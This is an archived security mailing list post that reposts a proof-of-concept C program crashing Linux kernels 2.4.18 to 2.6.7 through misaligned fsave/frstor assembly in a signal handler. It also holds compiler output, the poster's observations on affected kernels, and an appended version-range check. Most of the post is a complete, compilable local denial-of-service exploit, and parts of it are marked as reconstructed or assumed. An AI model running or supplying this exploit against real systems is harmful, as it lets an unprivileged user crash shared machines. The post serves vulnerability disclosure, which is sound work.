Open Source and information security mailing list archives
From: lorenzohgh at (Lorenzo Hernandez Garcia-Hierro)
Subject: linux kernel local crash seen on slashdot


> Looked through the archives here and didn't see this one yet..

There is also an article on Slashdot (I've been out of the list and
possibly others sent the link; anyway, I'm pasting it here):

There is proof-of-concept code in some of the Slashdot comments; this is
a modified version with more information (and a little change of fsave


/* --------------------
 * frstor Local Kernel exploit
 * Crashes any kernel from 2.4.18
 * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
 * Original proof of concept code
 * by
 * Added some stuff by
 * and fixed the fsave line with (*fpubuf).
 * --------------------
 *
 * Some debugging information made
 * available by
 * (compiler output for the fsave/frstor sequence in TakeDown):
 *
 *      pushl   %ebp
 *      movl    %esp, %ebp
 *      subl    $136, %esp
 *      leal    -120(%ebp), %eax
 *      movl    %eax, -124(%ebp)
 *      fsave -124(%ebp)
 *
 *      subl    $4, %esp
 *      pushl   $1
 *      pushl   $.LC0
 *      pushl   $2
 *      call    write
 *      addl    $16, %esp
 *      leal    -120(%ebp), %eax
 *      movl    %eax, -128(%ebp)
 *      frstor -128(%ebp)
 */

#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: save the FPU state into a 108-byte buffer, write a
 * marker, then restore it. The frstor is what triggers the crash on an
 * affected kernel. */
static void TakeDown(int ignore)
{
 char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
 __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
 write(2, "*", 1);
 __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
 struct itimerval spec;
 signal(SIGALRM, TakeDown);
 /* The timer values are not in the archived post; the ones below are an
  * assumption. Any non-zero it_value arms the timer and fires TakeDown. */
 spec.it_value.tv_sec = 0;
 spec.it_value.tv_usec = 100;
 spec.it_interval.tv_sec = 0;
 spec.it_interval.tv_usec = 100;
 setitimer(ITIMER_REAL, &spec, NULL);
 /* Keep the process busy until the handler runs (loop restored; the
  * archived post lost the brace and loop lines). */
 while (1)
  write(1, ".", 1);

 return 0;
}
// <<EOF


PS: My 2.4.25-gentoo seems not to be affected by this, but the bf24 flavour of
my old box is vulnerable.
Lorenzo Hernandez Garcia-Hierro <>
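An added triage helper, not part of the post above: it reads the running kernel's release string with uname() and reports whether it falls inside the 2.4.18 through 2.6.7 range named in the PoC header. The range comes from the header comment, the function names are my own, and as the PS above shows (a 2.4.25-gentoo kernel that was not affected), distribution kernels may carry backported fixes, so this is a first-pass check, not a verdict.

```c
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* Parse the leading "major.minor.patch" of a release string such as
 * "2.6.7-gentoo-r1"; anything after the third number is ignored.
 * Returns 1 on success, 0 if the string does not start with three numbers. */
static int parse_release(const char *release, int *major, int *minor, int *patch)
{
    return sscanf(release, "%d.%d.%d", major, minor, patch) == 3;
}

/* Three-component version compare; negative, zero or positive like strcmp. */
static int version_cmp(int a0, int a1, int a2, int b0, int b1, int b2)
{
    if (a0 != b0) return a0 - b0;
    if (a1 != b1) return a1 - b1;
    return a2 - b2;
}

/* Returns 1 when the release is within 2.4.18..2.6.7 inclusive (the range
 * given in the PoC header), 0 when it is outside that range, and -1 when
 * the release string cannot be parsed. */
int kernel_in_affected_range(const char *release)
{
    int ma, mi, pa;
    if (!parse_release(release, &ma, &mi, &pa))
        return -1;
    if (version_cmp(ma, mi, pa, 2, 4, 18) < 0) return 0;
    if (version_cmp(ma, mi, pa, 2, 6, 7) > 0) return 0;
    return 1;
}

int main(void)
{
    struct utsname u;
    if (uname(&u) != 0) {
        perror("uname");
        return 1;
    }
    int r = kernel_in_affected_range(u.release);
    printf("running kernel %s: %s\n", u.release,
           r == 1 ? "inside the 2.4.18-2.6.7 range reported for the frstor crash"
         : r == 0 ? "outside the reported range"
                  : "release string not parsed");
    return 0;
}
```

A result of 1 only means the version number is in the reported range; check the distribution's changelog for a backported fix before drawing conclusions.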
